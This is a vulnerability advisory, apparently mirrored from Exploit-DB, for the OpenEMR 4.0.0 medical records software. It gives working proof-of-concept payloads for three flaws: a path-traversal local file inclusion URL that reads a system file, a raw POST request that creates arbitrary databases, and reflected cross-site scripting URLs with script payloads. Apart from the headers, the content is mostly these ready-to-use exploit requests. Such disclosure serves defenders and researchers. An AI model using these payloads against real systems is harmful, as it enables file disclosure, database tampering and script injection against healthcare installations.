OpenEMR 4.0.0 – Multiple Vulnerabilities

  • 作者: AutoSec Tools
    日期: 2011-04-05
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17118/
  • ------------------------------------------------------------------------
    Software................OpenEMR 4.0.0
    Vulnerability...........Local File Inclusion
    Threat Level............Critical (4/5)
    Download................http://www.oemr.org/
    Discovery Date..........4/2/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    Email...................John Leitch <john@autosectools.com>
    ------------------------------------------------------------------------
    
    
    --Description--
    
    A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited
    to include arbitrary files.
    
    
    --PoC--
    
    http://localhost/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    
    ------------------------------------------------------------------------
    Software................OpenEMR 4.0.0
    Vulnerability...........Arbitrary Database Creation/Database Enumeration
    Threat Level............Low (1/5)
    Download................http://www.oemr.org/
    Discovery Date..........4/2/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    Email...................John Leitch <john@autosectools.com>
    ------------------------------------------------------------------------
    
    
    --PoC--
    
    POST http://localhost/openemr-4.0.0/contrib/util/express.php HTTP/1.1
    Host: localhost
    Connection: keep-alive
    User-Agent: x
    Content-Length: 142
    Cache-Control: max-age=0
    Origin: null
    Content-Type: multipart/form-data; boundary=----x
    Accept: text/html
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
    
    ------x
    Content-Disposition: form-data; name="submit"
    
    submit
    ------x
    Content-Disposition: form-data; name="newname"
    
    DatabaseName
    ------x--
    
    ------------------------------------------------------------------------
    Software................OpenEMR 4.0.0
    Vulnerability...........Reflected Cross-site Scripting
    Threat Level............Low (1/5)
    Download................http://www.oemr.org/
    Discovery Date..........4/2/2011
    Tested On...............Windows Vista + XAMPP
    ------------------------------------------------------------------------
    Author..................AutoSec Tools
    Site....................http://www.autosectools.com/
    Email...................John Leitch <john@autosectools.com>
    ------------------------------------------------------------------------
    
    
    --Description--
    
    A reflected cross-site scripting vulnerability in OpenEMR 4.0.0 can be
    exploited to execute arbitrary JavaScript.
    
    
    --PoC--
    
    http://localhost/openemr-4.0.0/setup.php?site=%3Cscript%3Ealert(0)%3C/script%3E
    
    http://localhost/openemr-4.0.0/gacl/admin/object_search.php?object_type=&action=&src_form=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E§ion_value=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E